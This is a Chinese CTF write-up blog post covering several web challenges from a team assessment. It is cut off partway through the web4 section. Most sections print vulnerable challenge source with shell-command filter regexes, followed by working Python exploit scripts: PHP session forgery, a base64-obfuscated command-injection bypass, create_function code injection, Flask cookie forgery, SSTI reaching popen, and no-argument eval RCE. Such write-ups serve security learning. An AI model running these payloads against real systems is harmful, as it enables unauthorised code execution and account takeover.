<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"www.getflag.cn","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="星盟战队的考核题，一共做了8道题，记录一下解题过程">
<meta property="og:type" content="article">
<meta property="og:title" content="xmctf">
<meta property="og:url" content="https://www.getflag.cn/2020/12/17/xmctf/index.html">
<meta property="og:site_name" content="kawhi&#39;s Blog">
<meta property="og:description" content="星盟战队的考核题，一共做了8道题，记录一下解题过程">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201217195705321.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201216154253806.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201216164519144.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201216173217133.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201216234950487.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201216235940134.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201217104001551.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201217104536108.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201217112138434.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201217115235793.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201217134249722.png">
<meta property="og:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201217191850645.png">
<meta property="article:published_time" content="2020-12-16T16:00:00.000Z">
<meta property="article:modified_time" content="2021-02-05T14:02:45.777Z">
<meta property="article:author" content="kawhi">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201217195705321.png">

<link rel="canonical" href="https://www.getflag.cn/2020/12/17/xmctf/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>xmctf | kawhi's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">kawhi's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">今天也没什么干劲</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-links">

    <a href="/links/" rel="section"><i class="fab fa-pagelines fa-fw"></i>友链</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://www.getflag.cn/2020/12/17/xmctf/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="http://yuhaojiang.gitee.io/picture/Blog头像.jpg">
      <meta itemprop="name" content="kawhi">
      <meta itemprop="description" content="随笔、分享、记录生活">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="kawhi's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          xmctf
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-12-17 00:00:00" itemprop="dateCreated datePublished" datetime="2020-12-17T00:00:00+08:00">2020-12-17</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-02-05 22:02:45" itemprop="dateModified" datetime="2021-02-05T22:02:45+08:00">2021-02-05</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E8%80%83%E6%A0%B8/" itemprop="url" rel="index"><span itemprop="name">考核</span></a>
                </span>
            </span>

          <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>11k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>10 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>星盟战队的考核题，一共做了8道题，记录一下解题过程<a id="more"></a></p>
<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201217195705321.png" alt="image-20201216234950487"></p>
<h3 id="web3-考核"><a href="#web3-考核" class="headerlink" title="web3-考核"></a>web3-考核</h3><p>题目源码为</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">$content = @$_GET[<span class="string">&#x27;content&#x27;</span>] ? <span class="string">&quot;---mylocalnote---\n&quot;</span> . $_GET[<span class="string">&#x27;content&#x27;</span>] : <span class="string">&quot;&quot;</span>;</span><br><span class="line">$name = @$_GET[<span class="string">&#x27;name&#x27;</span>] ? $_GET[<span class="string">&#x27;name&#x27;</span>] : <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">str_replace(<span class="string">&#x27;/&#x27;</span>, <span class="string">&#x27;&#x27;</span>, $name);</span><br><span class="line">str_replace(<span class="string">&#x27;\\&#x27;</span>, <span class="string">&#x27;&#x27;</span>, $name);</span><br><span class="line">file_put_contents(<span class="string">&quot;/tmp/&quot;</span> . $name, $content);</span><br><span class="line">session_start();</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_SESSION[<span class="string">&#x27;username&#x27;</span>])) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;Thank u,<span class="subst">&#123;$_SESSION[&#x27;username&#x27;]&#125;</span>&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">//flag in flag.php</span></span><br></pre></td></tr></table></figure>

<p>题目提示flag在flag.php下，访问提示</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">u are not admin,only admin can see flag!</span><br></pre></td></tr></table></figure>

<p>根据提示说只有admin才可以看到flag，说明我们需要满足<code>$_SESSION[&#39;username&#39;]=&#39;admin&#39;</code>，刚好题目中又存在<code>file_put_contents</code>函数可以往<code>/tmp</code>目录下写文件，使用burpsuite抓包的时候看到有个PHPSESSID，可以想到php中默认存储的文件名为<code>sess_PHPSESSID</code>，那么就可以往里面写入伪造用户的信息了，php默认的存储引擎格式为：键名+竖线+经过serialize()函数处理的值，所以我们可以写入的伪造信息为<code>username|s:6:&#39;admin&#39;;</code>，但是题目前面给我们拼接了一串字符<code>&quot;---mylocalnote---\n&quot;</code>，所以我们需要闭合一下，把他当做一个键值，就不会影响到我们后面的东西了</p>
<p>伪造好session信息后，访问flag.php即可获得flag，这里给出exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">r = requests.session()</span><br><span class="line">url = <span class="string">&quot;http://xmctf.top:8809/&quot;</span></span><br><span class="line">response = r.get(url)</span><br><span class="line">PHPSESSID = response.cookies[<span class="string">&quot;PHPSESSID&quot;</span>]</span><br><span class="line">payload = <span class="string">&#x27;?content=|N;username|s:5:&quot;admin&quot;;&amp;name=sess_&#x27;</span>+PHPSESSID</span><br><span class="line">r.get(url+payload)</span><br><span class="line">url2 = <span class="string">&quot;http://xmctf.top:8809/flag.php&quot;</span></span><br><span class="line">response2 = r.get(url2+payload)</span><br><span class="line">flag = response2.text</span><br><span class="line">print(flag)</span><br></pre></td></tr></table></figure>

<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201216154253806.png" alt="image-20201217195705321"></p>
<h3 id="RCE-训练"><a href="#RCE-训练" class="headerlink" title="RCE-训练"></a>RCE-训练</h3><p>源码为</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__file__</span>);</span><br><span class="line">$ip = $_GET[<span class="string">&#x27;ip&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($ip)) &#123;</span><br><span class="line">  <span class="keyword">if</span>(preg_match(<span class="string">&quot;/(;|`| |&amp;|cp|mv|cat|tail|more|rev|tac|\*|\&#123;)/i&quot;</span>, $ip))&#123;</span><br><span class="line">      <span class="keyword">die</span>(<span class="string">&quot;hack&quot;</span>);</span><br><span class="line">  &#125;<span class="keyword">else</span> <span class="keyword">if</span>(preg_match(<span class="string">&quot;/.*f.*l.*a.*g.*/&quot;</span>, $ip))&#123;</span><br><span class="line">      <span class="keyword">die</span>(<span class="string">&quot;no!&gt;&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  $a = shell_exec(<span class="string">&quot;ping -c 4 &quot;</span>.$ip);</span><br><span class="line">  var_dump($a);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>题目过滤了一些字符，可以使用base64+<code>%09</code>绕一下过滤，直接拿祥云杯Command这题的payload就能打，先用<code>ls /</code>找到flag在根目录下，然后直接<code>cat /flag</code>就行了，这里直接给出exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">r = requests.session()</span><br><span class="line">url = <span class="string">&quot;http://xmctf.top:8931/&quot;</span></span><br><span class="line">payload = <span class="string">&#x27;?ip=|echo%09%22Y2F0IC9mbGFn%22|base64%09-d|ba\s\h&#x27;</span></span><br><span class="line">response = r.get(url+payload)</span><br><span class="line">result = response.text</span><br><span class="line">print(result)</span><br></pre></td></tr></table></figure>

<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201216164519144.png" alt="image-20201216164519144"></p>
<h3 id="easy-web-考核"><a href="#easy-web-考核" class="headerlink" title="easy-web-考核"></a>easy-web-考核</h3><p>题目源码为</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line">show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line">$key = <span class="string">&quot;bad&quot;</span>;</span><br><span class="line">extract($_POST);</span><br><span class="line"><span class="keyword">if</span>($key === <span class="string">&#x27;bad&#x27;</span>)&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&#x27;badbad!!!&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line">$act = @$_GET[<span class="string">&#x27;act&#x27;</span>];</span><br><span class="line">$arg = @$_GET[<span class="string">&#x27;arg&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">&#x27;/^[a-z0-9_]*$/isD&#x27;</span>,$act)) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&#x27;check&#x27;</span>;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    $act($arg,<span class="string">&#x27;&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;666&#x27;</span>;</span><br></pre></td></tr></table></figure>

<p>一开始看到<code>extract</code>函数又看到<code>$key</code>必须全等于bad，很明显的变量覆盖，我们直接使用key=1即可绕过，然后看到<code>$act($arg,&#39;&#39;);</code>，在y1ng师傅之前出的一道题目[BJDCTF2020]EzPHP里面看到 过，不难想到用<code>create_function</code>函数来做这道题，首先需要用<code>\</code>来绕过这个正则，然后<code>create_function</code>这个函数第一个param是声明变量，第二个param是传递执行的代码</p>
<p>然后这道题目第二个param是为空的，所以我们需要在第一个param用<code>)&#123;&#125;</code>来闭合前面的方法，然后用<code>//</code>来注释后面没用的部分</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a = <span class="string">&#x27;)&#123;&#125;phpinfo();//&#x27;</span>;</span><br><span class="line">$myFunc = create_function($a,<span class="string">&#x27;&#x27;</span>);</span><br><span class="line"><span class="comment">//效果如下</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">myFunc</span>(<span class="params"></span>)</span>&#123;&#125;phpinfo();<span class="comment">//)&#123;&#125;</span></span><br></pre></td></tr></table></figure>

<p>这里直接给个exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">r = requests.session()</span><br><span class="line">url = <span class="string">&quot;http://xmctf.top:8848&quot;</span></span><br><span class="line">payload = <span class="string">&#x27;?act=\create_function&amp;arg=)&#123;&#125;system(&quot;cat /ffflll4g&quot;);//&#x27;</span></span><br><span class="line">data = &#123;<span class="string">&quot;key&quot;</span>:<span class="string">&quot;1&quot;</span>&#125;</span><br><span class="line">response = r.post(url+payload,data=data)</span><br><span class="line">result = response.text</span><br><span class="line">print(result)</span><br></pre></td></tr></table></figure>

<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201216173217133.png" alt="image-20201216154253806"></p>
<h3 id="web8-考核"><a href="#web8-考核" class="headerlink" title="web8-考核"></a>web8-考核</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Only the admin can get the flag,flag in &#x2F;flag</span><br><span class="line"></span><br><span class="line">you name is None</span><br></pre></td></tr></table></figure>

<p>提示只有admin用户才能够得到flag，burp抓包之后发现jwt编码的cookie，猜测需要jwt伪造</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;xmctf.top:8850&#x2F;?name&#x3D;&#123;&#123;config&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>然后在<code>&#123;&#123;config&#125;&#125;</code>中发现了密钥<code>woshicaiji</code></p>
<p>然后使用<code>flask_session_cookie_manager</code>脚本伪造成admin即可</p>
<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201216234950487.png" alt="image-20201216235940134"></p>
<p>这里给个exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">r = requests.session()</span><br><span class="line">url = <span class="string">&quot;http://xmctf.top:8850/flag&quot;</span></span><br><span class="line">headers = &#123;</span><br><span class="line"><span class="string">&#x27;Cookie&#x27;</span>:<span class="string">&#x27;session=eyJ1c2VybmFtZSI6eyIgYiI6IllXUnRhVzQ9In19.X9osaw.dYn7Gi00wAWefFCApz5jqOdYjsU&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line">response = r.get(url,headers=headers)</span><br><span class="line">result = response.text</span><br><span class="line">print(result)</span><br></pre></td></tr></table></figure>

<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201216235940134.png" alt="image-20201217104001551"></p>
<h3 id="web11-考核"><a href="#web11-考核" class="headerlink" title="web11-考核"></a>web11-考核</h3><p>本题考察的点为SSTI，随手试了一下发现<code>?name=kawhi</code>，会回显，于是fuzz一下</p>
<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201217104001551.png" alt="image-20201216173217133"></p>
<p>主要过滤了<code>_</code>和<code>.</code>，还发现过滤了<code>args</code>，可以想到用<code>values</code>绕过，但不知道为何我使用<code>values</code>绕过的时候会报一个500的错误，于是此方法作罢，但可以使用16进制绕过，先跑跑索引吧</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;()[&quot;\x5f\x5fclass\x5f\x5f&quot;][&quot;\x5f\x5fbases\x5f\x5f&quot;][0][&quot;\x5f\x5fsubclasses\x5f\x5f&quot;]()&#125;&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201217104536108.png" alt="image-20201217104536108"></p>
<p>这里使用跑的是popen的方法，<code>os._wrao_close</code>索引为117，但有个小坑最后的flag文件不能够直接读到，会提示如下，但发现base64编码后即可读取</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#39;flag&#39; in result !!!Bighack</span><br></pre></td></tr></table></figure>

<p>这里直接给个exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line">r = requests.session()</span><br><span class="line">url = <span class="string">&quot;http://xmctf.top:8960/?name=&quot;</span></span><br><span class="line">payload = <span class="string">&#x27;&#123;&#123;()[&quot;\\x5f\\x5fclass\\x5f\\x5f&quot;][&quot;\\x5f\\x5fbases\\x5f\\x5f&quot;][0][&quot;\\x5f\\x5fsubclasses\\x5f\\x5f&quot;]()[117][&quot;\\x5f\\x5finit\\x5f\\x5f&quot;][&quot;\\x5f\\x5fglobals\\x5f\\x5f&quot;][&quot;popen&quot;](&quot;cat /fl4g|base64&quot;)[&quot;read&quot;]()&#125;&#125;&#x27;</span></span><br><span class="line">response = r.get(url+payload)</span><br><span class="line">flag = re.findall(<span class="string">&quot;Hello (.*)&quot;</span>,response.text)[<span class="number">0</span>]</span><br><span class="line">print(base64.b64decode(flag))</span><br></pre></td></tr></table></figure>

<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201217112138434.png" alt="image-20201217112138434"></p>
<h3 id="web12-考核"><a href="#web12-考核" class="headerlink" title="web12-考核"></a>web12-考核</h3><p>题目源码为</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">header(<span class="string">&quot;Content-Type: text/html;charset=utf-8&quot;</span>);</span><br><span class="line"><span class="keyword">include</span> <span class="string">&quot;flag.php&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;flag在哪里呢？&lt;br&gt;&quot;</span>;</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">&#x27;exp&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">if</span> (!preg_match(<span class="string">&#x27;/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i&#x27;</span>, $_GET[<span class="string">&#x27;exp&#x27;</span>])) &#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="string">&#x27;;&#x27;</span> === preg_replace(<span class="string">&#x27;/[a-z,_]+\((?R)?\)/&#x27;</span>, <span class="literal">NULL</span>, $_GET[<span class="string">&#x27;exp&#x27;</span>])) &#123;</span><br><span class="line">            <span class="keyword">if</span> (!preg_match(<span class="string">&#x27;/et|cu|readfile|flip|na|info|dec|bin|hex|oct|pi|log/i&#x27;</span>, $_GET[<span class="string">&#x27;exp&#x27;</span>])) &#123;</span><br><span class="line">                <span class="comment">// echo $_GET[&#x27;exp&#x27;];</span></span><br><span class="line">                @<span class="keyword">eval</span>($_GET[<span class="string">&#x27;exp&#x27;</span>]);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span>&#123;</span><br><span class="line">                <span class="keyword">die</span>(<span class="string">&quot;还差一点哦！&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&quot;再好好想想！&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;还想读flag，臭弟弟！&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// highlight_file(__FILE__);</span></span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>

<p>比较简单的一道题，无参数RCE，先读取目录文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?exp&#x3D;var_dump(scandir(pos(localeconv())));</span><br></pre></td></tr></table></figure>

<p>得到</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">array(6) &#123; [0]&#x3D;&gt; string(1) &quot;.&quot; [1]&#x3D;&gt; string(2) &quot;..&quot; [2]&#x3D;&gt; string(4) &quot;.git&quot; [3]&#x3D;&gt; string(5) &quot;1.php&quot; [4]&#x3D;&gt; string(8) &quot;flag.php&quot; [5]&#x3D;&gt; string(9) &quot;index.php&quot; &#125; </span><br></pre></td></tr></table></figure>

<p>发现<code>flag.php</code>在倒数第二个位置上面，用反转数组再<code>next</code>读下一个即可</p>
<p>这里直接给个exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line">r = requests.session()</span><br><span class="line">url = <span class="string">&quot;http://xmctf.top:8873/&quot;</span></span><br><span class="line">payload = <span class="string">&#x27;?exp=show_source(next(array_reverse(scandir(pos(localeconv())))));&#x27;</span></span><br><span class="line">response = r.get(url+payload)</span><br><span class="line">flag = re.findall(<span class="string">&quot;0\&quot;&gt;&#x27;(.*)&#x27;&lt;/span&quot;</span>,response.text)[<span class="number">1</span>]</span><br><span class="line">print(flag)</span><br></pre></td></tr></table></figure>

<p><img src="https://kawhi.oss-cn-beijing.aliyuncs.com/img/image-20201217115235793.png" alt="image-20201217115235793"></p>
<h3 id="web4-考核"><a href="#web4-考核" class="headerlink" title="web4-考核"></a>web4-考核</h3><p>一开始打开题目啥都没，给了个</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">key：e086aa137fa19f67d27b39d0eca18610</span><br></pre></td></tr></table></figure>

<p>md5解密后为：1.1.1.1，抓包加XFF头：<code>X-Forwarded-For:1.1.1.1</code>，然后就可以得到：<code>dhudndrgrhs.php</code></p>
<p>访问得到题目源码为</p>
